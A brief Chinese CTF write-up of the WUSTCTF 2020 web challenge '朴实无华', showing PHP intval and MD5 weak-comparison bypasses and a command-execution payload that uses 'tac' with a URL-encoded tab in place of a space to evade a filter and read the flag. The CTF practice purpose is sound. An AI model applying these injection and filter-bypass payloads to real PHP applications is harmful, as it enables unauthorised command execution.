[WUSTCTF 2020]朴实无华-信息搜集-MD5弱比较-intval特性-命令执行-空格绕过

发表于2026-01-30|更新于2026-01-30|wpNSSCTF WEB

|总字数:150|阅读时长:1分钟|浏览量:

1.dirsearch 扫到robots.txt

2.可以看到有个.php文件，虽然不能访问但看看有没有什么线索

有个假flag，但是在响应头可以看到有个提示

访问后是一个新挑战

3.第一关payload：num=1e5

1 2	`intval不会解析e，intval("1e5")会是1 在1e5+1后，自动转化数字，成100001，所以得以绕过`

4.第二关payload：md5=0e215962017

1	`这md5后前面依然时0e，记一下就行`

5.第三关过滤了点东西，空格，cat，基本绕过

1	`get_flag=tac%09fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag`

最终payload

1	`?num=1e5&md5=0e215962017&get_flag=tac%09fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag`

文章作者: Lengkur

文章链接: http://lengkur.github.io/2026/01/30/wp/NSSCTF%20WEB/[WUSTCTF%202020]%E6%9C%B4%E5%AE%9E%E6%97%A0%E5%8D%8E-%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86-MD5%E5%BC%B1%E6%AF%94%E8%BE%83-intval%E7%89%B9%E6%80%A7-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C-%E7%A9%BA%E6%A0%BC%E7%BB%95%E8%BF%87/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Lengkur！